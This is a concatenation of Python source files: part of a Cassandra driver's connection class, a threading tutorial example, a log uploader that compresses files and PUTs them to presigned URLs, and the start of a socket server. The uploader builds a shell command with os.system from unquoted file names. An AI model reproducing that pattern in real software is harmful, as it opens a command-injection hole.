msg = "Unsupported protocol version on %s: %d" % (host, startup_version)
super(ProtocolVersionUnsupported, self).__init__(msg, host)
self.startup_version = startup_version
class ConnectionBusy(Exception):
"""
An attempt was made to send a message through a :class:`.Connection` that
was already at the max number of in-flight operations.
"""
pass
class ProtocolError(Exception):
"""
Communication did not match the protocol that this driver expects.
"""
pass
def defunct_on_error(f):
@wraps(f)
def wrapper(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
except Exception as exc:
self.defunct(exc)
return wrapper
DEFAULT_CQL_VERSION = '3.0.0'
if six.PY3:
def int_from_buf_item(i):
return i
else:
int_from_buf_item = ord
class Connection(object):
CALLBACK_ERR_THREAD_THRESHOLD = 100
in_buffer_size = 4096
out_buffer_size = 4096
cql_version = None
no_compact = False
protocol_version = ProtocolVersion.MAX_SUPPORTED
keyspace = None
compression = True
compressor = None
decompressor = None
ssl_options = None
last_error = None
# The current number of operations that are in flight. More precisely,
# the number of request IDs that are currently in use.
in_flight = 0
# Max concurrent requests allowed per connection. This is set optimistically high, allowing
# all request ids to be used in protocol version 3+. Normally concurrency would be controlled
# at a higher level by the application or concurrent.execute_concurrent. This attribute
# is for lower-level integrations that want some upper bound without reimplementing.
max_in_flight = 2 ** 15
# A set of available request IDs. When using the v3 protocol or higher,
# this will not initially include all request IDs in order to save memory,
# but the set will grow if it is exhausted.
request_ids = None
# Tracks the highest used request ID in order to help with growing the
# request_ids set
highest_request_id = 0
is_defunct = False
is_closed = False
lock = None
user_type_map = None
msg_received = False
is_unsupported_proto_version = False
is_control_connection = False
signaled_error = False # used for flagging at the pool level
allow_beta_protocol_version = False
_iobuf = None
_current_frame = None
_socket = None
_socket_impl = socket
_ssl_impl = ssl
_check_hostname = False
def __init__(self, host='127.0.0.1', port=9042, authenticator=None,
ssl_options=None, sockopts=None, compression=True,
cql_version=None, protocol_version=ProtocolVersion.MAX_SUPPORTED, is_control_connection=False,
user_type_map=None, connect_timeout=None, allow_beta_protocol_version=False, no_compact=False):
self.host = host
self.port = port
self.authenticator = authenticator
self.ssl_options = ssl_options.copy() if ssl_options else None
self.sockopts = sockopts
self.compression = compression
self.cql_version = cql_version
self.protocol_version = protocol_version
self.is_control_connection = is_control_connection
self.user_type_map = user_type_map
self.connect_timeout = connect_timeout
self.allow_beta_protocol_version = allow_beta_protocol_version
self.no_compact = no_compact
self._push_watchers = defaultdict(set)
self._requests = {}
self._iobuf = io.BytesIO()
if ssl_options:
self._check_hostname = bool(self.ssl_options.pop('check_hostname', False))
if self._check_hostname:
if not getattr(ssl, 'match_hostname', None):
raise RuntimeError("ssl_options specify 'check_hostname', but ssl.match_hostname is not provided. "
"Patch or upgrade Python to use this option.")
if protocol_version >= 3:
self.max_request_id = min(self.max_in_flight - 1, (2 ** 15) - 1)
# Don't fill the deque with 2**15 items right away. Start with some and add
# more if needed.
initial_size = min(300, self.max_in_flight)
self.request_ids = deque(range(initial_size))
self.highest_request_id = initial_size - 1
else:
self.max_request_id = min(self.max_in_flight, (2 ** 7) - 1)
self.request_ids = deque(range(self.max_request_id + 1))
self.highest_request_id = self.max_request_id
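# Note (added for clarity): protocol v3+ carries the stream id as a signed
# 16-bit field, so up to 2**15 client-initiated request ids are available
# (negative ids are reserved for server-pushed events), while v1/v2 use a
# signed byte and cap max_request_id at 127.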
self.lock = RLock()
self.connected_event = Event()
@classmethod
def initialize_reactor(cls):
"""
Called once by Cluster.connect(). This should be used by implementations
to set up any resources that will be shared across connections.
"""
pass
@classmethod
def handle_fork(cls):
"""
Called after a forking. This should cleanup any remaining reactor state
from the parent process.
"""
pass
@classmethod
def create_timer(cls, timeout, callback):
raise NotImplementedError()
@classmethod
def factory(cls, host, timeout, *args, **kwargs):
"""
A factory function which returns connections which have
succeeded in connecting and are ready for service (or
raises an exception otherwise).
"""
start = time.time()
kwargs['connect_timeout'] = timeout
conn = cls(host, *args, **kwargs)
elapsed = time.time() - start
conn.connected_event.wait(timeout - elapsed)
if conn.last_error:
if conn.is_unsupported_proto_version:
raise ProtocolVersionUnsupported(host, conn.protocol_version)
raise conn.last_error
elif not conn.connected_event.is_set():
conn.close()
raise OperationTimedOut("Timed out creating connection (%s seconds)" % timeout)
else:
return conn
def _connect_socket(self):
sockerr = None
addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
if not addresses:
raise ConnectionException("getaddrinfo returned empty list for %s" % (self.host,))
for (af, socktype, proto, canonname, sockaddr) in addresses:
try:
self._socket = self._socket_impl.socket(af, socktype, proto)
if self.ssl_options:
if not self._ssl_impl:
raise RuntimeError("This version of Python was not compiled with SSL support")
self._socket = self._ssl_impl.wrap_socket(self._socket, **self.ssl_options)
self._socket.settimeout(self.connect_timeout)
self._socket.connect(sockaddr)
self._socket.settimeout(None)
if self._check_hostname:
ssl.match_hostname(self._socket.getpeercert(), self.host)
sockerr = None
break
except socket.error as err:
if self._socket:
self._socket.close()
self._socket = None
sockerr = err
if sockerr:
raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror or sockerr))
if self.sockopts:
for args in self.sockopts:
self._socket.setsockopt(*args)
def close(self):
raise NotImplementedError()
def defunct(self, exc):
with self.lock:
if self.is_defunct or self.is_closed:
return
self.is_defunct = True
exc_info = sys.exc_info()
# if we are not handling an exception, just use the passed exception, and don't try to format exc_info with the message
if any(exc_info):
log.debug("Defuncting connection (%s) to %s:",
id(self), self.host, exc_info=exc_info)
else:
log.debug("Defuncting connection (%s) to %s: %s",
id(self), self.host, exc)
self.last_error = exc
self.close()
self.error_all_requests(exc)
self.connected_event.set()
return exc
def error_all_requests(self, exc):
with self.lock:
requests = self._requests
self._requests = {}
if not requests:
return
new_exc = ConnectionShutdown(str(exc))
def try_callback(cb):
try:
cb(new_exc)
except Exception:
log.warning("Ignoring unhandled exception while erroring requests for a "
"failed connection (%s) to host %s:",
id(self), self.host, exc_info=True)
# run first callback from this thread to ensure pool state before leaving
cb, _, _ = requests.popitem()[1]
try_callback(cb)
if not requests:
return
# additional requests are optionally errored from a separate thread
# The default callback and retry logic is fairly expensive -- we don't
# want to tie up the event thread when there are many requests
def err_all_callbacks():
for cb, _, _ in requests.values():
try_callback(cb)
if len(requests) < Connection.CALLBACK_ERR_THREAD_THRESHOLD:
err_all_callbacks()
else:
# daemon thread here because we want to stay decoupled from the cluster TPE
# TODO: would it make sense to just have a driver-global TPE?
t = Thread(target=err_all_callbacks)
t.daemon = True
t.start()
def get_request_id(self):
"""
This must be called while self.lock is held.
"""
try:
return self.request_ids.popleft()
except IndexError:
new_request_id = self.highest_request_id + 1
# in_flight checks should guarantee this
assert new_request_id <= self.max_request_id
self.highest_request_id = new_request_id
return self.highest_request_id
def handle_pushed(self, response):
log.debug("Message pushed from server: %r", response)
for cb in self._push_watchers.get(response.event_type, []):
try:
cb(response.event_args)
except Exception:
log.exception("Pushed event handler errored, ignoring:")
def send_msg(self, msg, request_id, cb, encoder=ProtocolHandler.encode_message, decoder=ProtocolHandler.decode_message, result_metadata=None):
if self.is_defunct:
raise ConnectionShutdown("Connection to %s is defunct" % self.host)
elif self.is_closed:
raise ConnectionShutdown("Connection to %s is closed" % self.host)
# queue the decoder function with the request
# this allows us to inject custom functions per request to encode, decode messages
self._requests[request_id] = (cb, decoder, result_metadata)
msg = encoder(msg, request_id, self.protocol_version, compressor=self.compressor, allow_beta_protocol_version=self.allow_beta_protocol_version)
self.push(msg)
return len(msg)
def wait_for_response(self, msg, timeout=None):
return self.wait_for_responses(msg, timeout=timeout)[0]
def wait_for_responses(self, *msgs, **kwargs):
"""
Returns a list of (success, response) tuples. If success
is False, response will be an Exception. Otherwise, response
will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised.
"""
if self.is_closed or self.is_defunct:
raise ConnectionShutdown("Connection %s is already closed" % (self, ))
timeout = kwargs.get('timeout')
fail_on_error = kwargs.get('fail_on_error', True)
waiter = ResponseWaiter(self, len(msgs), fail_on_error)
# busy wait for sufficient space on the connection
messages_sent = 0
while True:
needed = len(msgs) - messages_sent
with self.lock:
available = min(needed, self.max_request_id - self.in_flight + 1)
request_ids = [self.get_request_id() for _ in range(available)]
self.in_flight += available
for i, request_id in enumerate(request_ids):
self.send_msg(msgs[messages_sent + i],
request_id,
partial(waiter.got_response, index=messages_sent + i))
messages_sent += available
if messages_sent == len(msgs):
break
else:
if timeout is not None:
timeout -= 0.01
if timeout <= 0.0:
raise OperationTimedOut()
time.sleep(0.01)
try:
return waiter.deliver(timeout)
except OperationTimedOut:
raise
except Exception as exc:
self.defunct(exc)
raise
def register_watcher(self, event_type, callback, register_timeout=None):
"""
Register a callback for a given event type.
"""
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=[event_type]),
timeout=register_timeout)
def register_watchers(self, type_callback_dict, register_timeout=None):
"""
Register multiple callback/event type pairs, expressed as a dict.
"""
for event_type, callback in type_callback_dict.items():
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=type_callback_dict.keys()),
timeout=register_timeout)
def control_conn_disposed(self):
self.is_control_connection = False
self._push_watchers = {}
@defunct_on_error
def _read_frame_header(self):
buf = self._iobuf.getvalue()
pos = len(buf)
if pos:
version = int_from_buf_item(buf[0]) & PROTOCOL_VERSION_MASK
if version > ProtocolVersion.MAX_SUPPORTED:
raise ProtocolError("This version of the driver does not support protocol version %d" % version)
frame_header = frame_header_v3 if version >= 3 else frame_header_v1_v2
# this frame header struct is everything after the version byte
header_size = frame_header.size + 1
if pos >= header_size:
flags, stream, op, body_len = frame_header.unpack_from(buf, 1)
if body_len < 0:
raise ProtocolError("Received negative body length: %r" % body_len)
self._current_frame = _Frame(version, flags, stream, op, header_size, body_len + header_size)
return pos
def _reset_frame(self):
self._iobuf = io.BytesIO(self._iobuf.read())
self._iobuf.seek(0, 2) # io.SEEK_END == 2 (constant not present in 2.6)
self._current_frame = None
def process_io_buffer(self):
while True:
if not self._current_frame:
pos = self._read_frame_header()
else:
pos = self._iobuf.tell()
if not self._current_frame or pos < self._current_frame.end_pos:
# we don't have a complete header yet or we
# already saw a header, but we don't have a
# complete message yet
return
else:
frame = self._current_frame
self._iobuf.seek(frame.body_offset)
msg = self._iobuf.read(frame.end_pos - frame.body_offset)
self.process_msg(frame, msg)
self._reset_frame()
@defunct_on_error
def process_msg(self, header, body):
self.msg_received = True
stream_id = header.stream
if stream_id < 0:
callback = None
decoder = ProtocolHandler.decode_message
result_metadata = None
else:
try:
callback, decoder, result_metadata = self._requests.pop(stream_id)
# This can only happen if the stream_id was
# removed due to an OperationTimedOut
except KeyError:
return
with self.lock:
self.request_ids.append(stream_id)
try:
response = decoder(header.version, self.user_type_map, stream_id,
header.flags, header.opcode, body, self.decompressor, result_metadata)
except Exception as exc:
log.exception("Error decoding response from Cassandra. "
"%s; buffer: %r", header, self._iobuf.getvalue())
if callback is not None:
callback(exc)
self.defunct(exc)
return
try:
if stream_id >= 0:
if isinstance(response, ProtocolException):
if 'unsupported protocol version' in response.message:
self.is_unsupported_proto_version = True
else:
log.error("Closing connection %s due to protocol error: %s", self, response.summary_msg())
self.defunct(response)
if callback is not None:
callback(response)
else:
self.handle_pushed(response)
except Exception:
log.exception("Callback handler errored, ignoring:")
@defunct_on_error
def _send_options_message(self):
if self.cql_version is None and (not self.compression or not locally_supported_compressions):
log.debug("Not sending options message for new connection(%s) to %s "
"because compression is disabled and a cql version was not "
"specified", id(self), self.host)
self._compressor = None
self.cql_version = DEFAULT_CQL_VERSION
self._send_startup_message(no_compact=self.no_compact)
else:
log.debug("Sending initial options message for new connection (%s) to %s", id(self), self.host)
self.send_msg(OptionsMessage(), self.get_request_id(), self._handle_options_response)
@defunct_on_error
def _handle_options_response(self, options_response):
if self.is_defunct:
return
if not isinstance(options_response, SupportedMessage):
if isinstance(options_response, ConnectionException):
raise options_response
else:
log.error("Did not get expected SupportedMessage response; "
"instead, got: %s", options_response)
raise ConnectionException("Did not get expected SupportedMessage "
"response; instead, got: %s"
% (options_response,))
log.debug("Received options response on new connection (%s) from %s",
id(self), self.host)
supported_cql_versions = options_response.cql_versions
remote_supported_compressions = options_response.options['COMPRESSION']
if self.cql_version:
if self.cql_version not in supported_cql_versions:
raise ProtocolError(
"cql_version %r is not supported by remote (w/ native "
"protocol). Supported versions: %r"
% (self.cql_version, supported_cql_versions))
else:
self.cql_version = supported_cql_versions[0]
self._compressor = None
compression_type = None
if self.compression:
overlap = (set(locally_supported_compressions.keys()) &
set(remote_supported_compressions))
if len(overlap) == 0:
log.debug("No available compression types supported on both ends."
" locally supported: %r. remotely supported: %r",
locally_supported_compressions.keys(),
remote_supported_compressions)
else:
compression_type = None
if isinstance(self.compression, six.string_types):
# the user picked a specific compression type ('snappy' or 'lz4')
if self.compression not in remote_supported_compressions:
raise ProtocolError(
"The requested compression type (%s) is not supported by the Cassandra server at %s"
% (self.compression, self.host))
compression_type = self.compression
else:
# our locally supported compressions are ordered to prefer
# lz4, if available
for k in locally_supported_compressions.keys():
if k in overlap:
compression_type = k
break
# set the decompressor here, but set the compressor only after
# a successful Ready message
self._compressor, self.decompressor = \
locally_supported_compressions[compression_type]
self._send_startup_message(compression_type, no_compact=self.no_compact)
@defunct_on_error
def _send_startup_message(self, compression=None, no_compact=False):
log.debug("Sending StartupMessage on %s", self)
opts = {}
if compression:
opts['COMPRESSION'] = compression
if no_compact:
opts['NO_COMPACT'] = 'true'
sm = StartupMessage(cqlversion=self.cql_version, options=opts)
self.send_msg(sm, self.get_request_id(), cb=self._handle_startup_response)
log.debug("Sent StartupMessage on %s", self)
@defunct_on_error
def _handle_startup_response(self, startup_response, did_authenticate=False):
if self.is_defunct:
return
if isinstance(startup_response, ReadyMessage):
log.debug("Got ReadyMessage on new connection (%s) from %s", id(self), self.host)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(startup_response, AuthenticateMessage):
log.debug("Got AuthenticateMessage on new connection (%s) from %s: %s",
id(self), self.host, startup_response.authenticator)
if self.authenticator is None:
raise AuthenticationFailed('Remote end requires authentication.')
if isinstance(self.authenticator, dict):
log.debug("Sending credentials-based auth response on %s", self)
cm = CredentialsMessage(creds=self.authenticator)
callback = partial(self._handle_startup_response, did_authenticate=True)
self.send_msg(cm, self.get_request_id(), cb=callback)
else:
log.debug("Sending SASL-based auth response on %s", self)
self.authenticator.server_authenticator_class = startup_response.authenticator
initial_response = self.authenticator.initial_response()
initial_response = "" if initial_response is None else initial_response
self.send_msg(AuthResponseMessage(initial_response), self.get_request_id(), self._handle_auth_response)
elif isinstance(startup_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.host, startup_response.summary_msg())
if did_authenticate:
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.host, startup_response.summary_msg()))
else:
raise ConnectionException(
"Failed to initialize new connection to %s: %s"
% (self.host, startup_response.summary_msg()))
elif isinstance(startup_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the startup handshake", (self.host))
raise startup_response
else:
msg = "Unexpected response during Connection setup: %r"
log.error(msg, startup_response)
raise ProtocolError(msg % (startup_response,))
@defunct_on_error
def _handle_auth_response(self, auth_response):
if self.is_defunct:
return
if isinstance(auth_response, AuthSuccessMessage):
log.debug("Connection %s successfully authenticated", self)
self.authenticator.on_authentication_success(auth_response.token)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(auth_response, AuthChallengeMessage):
response = self.authenticator.evaluate_challenge(auth_response.challenge)
msg = AuthResponseMessage("" if response is None else response)
log.debug("Responding to auth challenge on %s", self)
self.send_msg(msg, self.get_request_id(), self._handle_auth_response)
elif isinstance(auth_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.host, auth_response.summary_msg())
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.host, auth_response.summary_msg()))
elif isinstance(auth_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the authentication process", self.host)
raise auth_response
else:
msg = "Unexpected response during Connection authentication to %s: %r"
log.error(msg, self.host, auth_response)
raise ProtocolError(msg % (self.host, auth_response))
def set_keyspace_blocking(self, keyspace):
if not keyspace or keyspace == self.keyspace:
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
try:
result = self.wait_for_response(query)
except InvalidRequestException as ire:
# the keyspace probably doesn't exist
raise ire.to_exception()
except Exception as exc:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (exc,), self.host)
self.defunct(conn_exc)
raise conn_exc
if isinstance(result, ResultMessage):
self.keyspace = keyspace
else:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.host)
self.defunct(conn_exc)
raise conn_exc
def set_keyspace_async(self, keyspace, callback):
"""
Use this in order to avoid deadlocking the event loop thread.
When the operation completes, `callback` will be called with
two arguments: this connection and an Exception if an error
occurred, otherwise :const:`None`.
This method will always increment the :attr:`.in_flight` attribute, even if
it doesn't need to make a request, just to maintain an
":attr:`.in_flight` is incremented" invariant.
"""
# Here we increment in_flight unconditionally, whether we need to issue
# a request or not. This is bad, but allows callers -- specifically
# _set_keyspace_for_all_conns -- to assume that we increment
# self.in_flight during this call. This allows the passed callback to
# safely call HostConnection{Pool,}.return_connection on this
# Connection.
#
# We use a busy wait on the lock here because:
# - we'll only spin if the connection is at max capacity, which is very
# unlikely for a set_keyspace call
# - it allows us to avoid signaling a condition every time a request completes
while True:
with self.lock:
if self.in_flight < self.max_request_id:
self.in_flight += 1
break
time.sleep(0.001)
if not keyspace or keyspace == self.keyspace:
callback(self, None)
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
def process_result(result):
if isinstance(result, ResultMessage):
self.keyspace = keyspace
callback(self, None)
elif isinstance(result, InvalidRequestException):
callback(self, result.to_exception())
else:
callback(self, self.defunct(ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.host)))
# We've incremented self.in_flight above, so we "have permission" to
# acquire a new request id
request_id = self.get_request_id()
self.send_msg(query, request_id, process_result)
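# Illustrative usage sketch (not part of the original source; assumes a pool
# object that tracks connections): the async variant hands the result back
# through a callback instead of blocking the event loop thread.
#
#   def _on_keyspace_set(conn, error):
#       if error is not None:
#           log.warning("USE keyspace failed: %r", error)
#       pool.return_connection(conn)   # safe: in_flight was already incremented
#
#   conn.set_keyspace_async("my_keyspace", _on_keyspace_set)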
@property
def is_idle(self):
return not self.msg_received
def reset_idle(self):
self.msg_received = False
def __str__(self):
status = ""
if self.is_defunct:
status = " (defunct)"
elif self.is_closed:
status = " (closed)"
return "<%s(%r) %s:%d%s>" % (self.__class__.__name__, id(self), self.host, self.port, status)
__repr__ = __str__
class ResponseWaiter(object):
def __init__(self, connection, num_responses, fail_on_error):
self.connection = connection
self.pending = num_responses
self.fail_on_error = fail_on_error
self.error = None
self.responses = [None] * num_responses
self.event = Event()
def got_response(self, response, index):
with self.connection.lock:
self.connection.in_flight -= 1
if isinstance(response, Exception):
if hasattr(response, 'to_exception'):
response = response.to_exception()
if self.fail_on_error:
self.error = response
self.event.set()
else:
self.responses[index] = (False, response)
else:
if not self.fail_on_error:
self.responses[index] = (True, response)
else:
self.responses[index] = response
self.pending -= 1
if not self.pending:
self.event.set()
def deliver(self, timeout=None):
"""
If fail_on_error was set to False, a list of (success, response)
tuples will be returned. If success is False, response will be
an Exception. Otherwise, response will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised. Otherwise,
the normal response will be returned.
"""
self.event.wait(timeout)
if self.error:
raise self.error
elif not self.event.is_set():
raise OperationTimedOut()
else:
return self.responses
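# Illustrative usage sketch (assumption: this mirrors how a wait-for-responses
# helper would drive the class; names below are hypothetical):
#
#   waiter = ResponseWaiter(conn, num_responses=len(messages), fail_on_error=False)
#   for i, msg in enumerate(messages):
#       conn.send_msg(msg, conn.get_request_id(), partial(waiter.got_response, index=i))
#   results = waiter.deliver(timeout=10.0)   # list of (success, response) tuples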
class HeartbeatFuture(object):
def __init__(self, connection, owner):
self._exception = None
self._event = Event()
self.connection = connection
self.owner = owner
log.debug("Sending options message heartbeat on idle connection (%s) %s",
id(connection), connection.host)
with connection.lock:
if connection.in_flight <= connection.max_request_id:
connection.in_flight += 1
connection.send_msg(OptionsMessage(), connection.get_request_id(), self._options_callback)
else:
self._exception = Exception("Failed to send heartbeat because connection 'in_flight' exceeds threshold")
self._event.set()
def wait(self, timeout):
self._event.wait(timeout)
if self._event.is_set():
if self._exception:
raise self._exception
else:
raise OperationTimedOut("Connection heartbeat timeout after %s seconds" % (timeout,), self.connection.host)
def _options_callback(self, response):
if isinstance(response, SupportedMessage):
log.debug("Received options response on connection (%s) from %s",
id(self.connection), self.connection.host)
else:
if isinstance(response, ConnectionException):
self._exception = response
else:
self._exception = ConnectionException("Received unexpected response to OptionsMessage: %s"
% (response,))
self._event.set()
class ConnectionHeartbeat(Thread):
def __init__(self, interval_sec, get_connection_holders, timeout):
Thread.__init__(self, name="Connection heartbeat")
self._interval = interval_sec
self._timeout = timeout
self._get_connection_holders = get_connection_holders
self._shutdown_event = Event()
self.daemon = True
self.start()
class ShutdownException(Exception):
pass
def run(self):
self._shutdown_event.wait(self._interval)
while not self._shutdown_event.is_set():
start_time = time.time()
futures = []
failed_connections = []
try:
for connections, owner in [(o.get_connections(), o) for o in self._get_connection_holders()]:
for connection in connections:
self._raise_if_stopped()
if not (connection.is_defunct or connection.is_closed):
if connection.is_idle:
try:
futures.append(HeartbeatFuture(connection, owner))
except Exception as e:
log.warning("Failed sending heartbeat message on connection (%s) to %s",
id(connection), connection.host)
failed_connections.append((connection, owner, e))
else:
connection.reset_idle()
else:
log.debug("Cannot send heartbeat message on connection (%s) to %s",
id(connection), connection.host)
# make sure the owner sees this defunct/closed connection
owner.return_connection(connection)
self._raise_if_stopped()
# Wait max `self._timeout` seconds for all HeartbeatFutures to complete
timeout = self._timeout
start_time = time.time()
for f in futures:
self._raise_if_stopped()
connection = f.connection
try:
f.wait(timeout)
# TODO: move this, along with connection locks in pool, down into Connection
with connection.lock:
connection.in_flight -= 1
connection.reset_idle()
except Exception as e:
log.warning("Heartbeat failed for connection (%s) to %s",
id(connection), connection.host)
failed_connections.append((f.connection, f.owner, e))
timeout = self._timeout - (time.time() - start_time)
for connection, owner, exc in failed_connections:
self._raise_if_stopped()
if not connection.is_control_connection:
# Only HostConnection supports shutdown_on_error
owner.shutdown_on_error = True
connection.defunct(exc)
owner.return_connection(connection)
except self.ShutdownException:
pass
except Exception:
log.error("Failed connection heartbeat", exc_info=True)
elapsed = time.time() - start_time
self._shutdown_event.wait(max(self._interval - elapsed, 0.01))
def stop(self):
self._shutdown_event.set()
self.join()
def _raise_if_stopped(self):
if self._shutdown_event.is_set():
raise self.ShutdownException()
class Timer(object):
canceled = False
def __init__(self, timeout, callback):
self.end = time.time() + timeout
self.callback = callback
def __lt__(self, other):
return self.end < other.end
def cancel(self):
self.canceled = True
def finish(self, time_now):
if self.canceled:
return True
if time_now >= self.end:
self.callback()
return True
return False
class TimerManager(object):
def __init__(self):
self._queue = []
self._new_timers = []
def add_timer(self, timer):
"""
called from client thread with a Timer object
"""
self._new_timers.append((timer.end, timer))
def service_timeouts(self):
"""
run callbacks on all expired timers
Called from the event thread
:return: next end time, or None
"""
queue = self._queue
if self._new_timers:
new_timers = self._new_timers
while new_timers:
heappush(queue, new_timers.pop())
if queue:
now = time.time()
while queue:
try:
timer = queue[0][1]
if timer.finish(now):
heappop(queue)
else:
return timer.end
except Exception:
log.exception("Exception while servicing timeout callback: ")
@property
def next_timeout(self):
try:
return self._queue[0][0]
except IndexError:
pass
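# A minimal sketch (not part of the original module) of the Timer/TimerManager
# contract: client code adds timers, and an event-loop thread repeatedly calls
# service_timeouts() to fire the callbacks of expired timers. Guarded so it
# never runs on import; the underscore-prefixed names are hypothetical.
if __name__ == "__main__":
    import time as _time
    def _on_timeout():
        print("timer fired")
    _manager = TimerManager()
    _manager.add_timer(Timer(timeout=0.5, callback=_on_timeout))
    _manager.service_timeouts()  # moves newly added timers onto the internal heap
    while _manager.next_timeout is not None:
        _manager.service_timeouts()
        _time.sleep(0.05)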
|
Chap10_Example10.4.py
|
from threading import *
def my_msgprint(i):
for loop in range(1,i):
print(f"{current_thread().getName()} thread running count is {loop}")
mthread = Thread(target = my_msgprint, name = 'MyChildThread', args = (5,))
mthread.start()
for i in range(1,5):
print(f"Main thread running count is {i}")
|
uploader.py
|
#!/usr/bin/env python
import os
import time
import stat
import random
import ctypes
import inspect
import requests
import traceback
import threading
from selfdrive.swaglog import cloudlog
from selfdrive.loggerd.config import DONGLE_ID, DONGLE_SECRET, ROOT
from common.api import api_get
def raise_on_thread(t, exctype):
for ctid, tobj in threading._active.items():
if tobj is t:
tid = ctid
break
else:
raise Exception("Could not find thread")
# Raises an exception of type exctype in the thread with id tid
if not inspect.isclass(exctype):
raise TypeError("Only types can be raised (not instances)")
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid),
ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# "if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, 0)
raise SystemError("PyThreadState_SetAsyncExc failed")
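# Illustrative usage sketch: this is how Uploader.abort_upload below interrupts
# a blocking upload from another thread (do_blocking_upload is hypothetical):
#
#   t = threading.Thread(target=do_blocking_upload)
#   t.start()
#   raise_on_thread(t, SystemExit)   # asynchronously injects SystemExit into t
#   t.join()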
def listdir_with_creation_date(d):
lst = os.listdir(d)
for fn in lst:
try:
st = os.stat(os.path.join(d, fn))
ctime = st[stat.ST_CTIME]
yield (ctime, fn)
except OSError:
cloudlog.exception("listdir_with_creation_date: stat failed?")
yield (None, fn)
def listdir_by_creation_date(d):
times_and_paths = list(listdir_with_creation_date(d))
return [path for _, path in sorted(times_and_paths)]
def clear_locks(root):
for logname in os.listdir(root):
path = os.path.join(root, logname)
try:
for fname in os.listdir(path):
if fname.endswith(".lock"):
os.unlink(os.path.join(path, fname))
except OSError:
cloudlog.exception("clear_locks failed")
class Uploader(object):
def __init__(self, dongle_id, dongle_secret, root):
self.dongle_id = dongle_id
self.dongle_secret = dongle_secret
self.root = root
self.upload_thread = None
self.last_resp = None
self.last_exc = None
def clean_dirs(self):
try:
for logname in os.listdir(self.root):
path = os.path.join(self.root, logname)
# remove empty directories
if not os.listdir(path):
os.rmdir(path)
except OSError:
cloudlog.exception("clean_dirs failed")
def gen_upload_files(self):
for logname in listdir_by_creation_date(self.root):
path = os.path.join(self.root, logname)
names = os.listdir(path)
if any(name.endswith(".lock") for name in names):
continue
for name in names:
key = os.path.join(logname, name)
fn = os.path.join(path, name)
yield (name, key, fn)
def next_file_to_upload(self):
# try to upload log files first
for name, key, fn in self.gen_upload_files():
if name in ["rlog", "rlog.bz2"]:
return (key, fn, 0)
# then upload camera files, even when not on wifi
for name, key, fn in self.gen_upload_files():
if not name.endswith('.lock') and not name.endswith(".tmp"):
return (key, fn, 1)
return None
def do_upload(self, key, fn):
try:
url_resp = api_get("upload_url", timeout=2,
id=self.dongle_id, secret=self.dongle_secret,
path=key)
url = url_resp.text
cloudlog.info({"upload_url", url})
with open(fn, "rb") as f:
self.last_resp = requests.put(url, data=f)
except Exception as e:
self.last_exc = (e, traceback.format_exc())
raise
def normal_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
try:
self.do_upload(key, fn)
except Exception:
pass
return self.last_resp
def killable_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
self.upload_thread = threading.Thread(target=lambda: self.do_upload(key, fn))
self.upload_thread.start()
self.upload_thread.join()
self.upload_thread = None
return self.last_resp
def abort_upload(self):
thread = self.upload_thread
if thread is None:
return
if not thread.is_alive():
return
raise_on_thread(thread, SystemExit)
thread.join()
def upload(self, key, fn):
# write out the bz2-compressed file
if fn.endswith("log"):
ext = ".bz2"
cloudlog.info("compressing %r to %r", fn, fn+ext)
if os.system("nice -n 19 bzip2 -c %s > %s.tmp && mv %s.tmp %s%s && rm %s" % (fn, fn, fn, fn, ext, fn)) != 0:
cloudlog.exception("upload: bzip2 compression failed")
return False
# assuming file is named properly
key += ext
fn += ext
try:
sz = os.path.getsize(fn)
except OSError:
cloudlog.exception("upload: getsize failed")
return False
cloudlog.event("upload", key=key, fn=fn, sz=sz)
cloudlog.info("checking %r with size %r", key, sz)
if sz == 0:
# can't upload files of 0 size
os.unlink(fn) # delete the file
success = True
else:
cloudlog.info("uploading %r", fn)
# stat = self.killable_upload(key, fn)
stat = self.normal_upload(key, fn)
if stat is not None and stat.status_code == 200:
cloudlog.event("upload_success", key=key, fn=fn, sz=sz)
os.unlink(fn) # delete the file
success = True
else:
cloudlog.event("upload_failed", stat=stat, exc=self.last_exc, key=key, fn=fn, sz=sz)
success = False
self.clean_dirs()
return success
def uploader_fn(exit_event):
cloudlog.info("uploader_fn")
uploader = Uploader(DONGLE_ID, DONGLE_SECRET, ROOT)
while True:
backoff = 0.1
while True:
if exit_event.is_set():
return
d = uploader.next_file_to_upload()
if d is None:
break
key, fn, _ = d
cloudlog.info("to upload %r", d)
success = uploader.upload(key, fn)
if success:
backoff = 0.1
else:
cloudlog.info("backoff %r", backoff)
time.sleep(backoff + random.uniform(0, backoff))
backoff *= 2
cloudlog.info("upload done, success=%r", success)
time.sleep(5)
def main(gctx=None):
uploader_fn(threading.Event())
if __name__ == "__main__":
main()
|
server.py
|
import socket
import sys
import time
import threading
x = socket.socket()
h_name= socket.gethostname()
print("server will start on host: ", h_name)
port= 1234
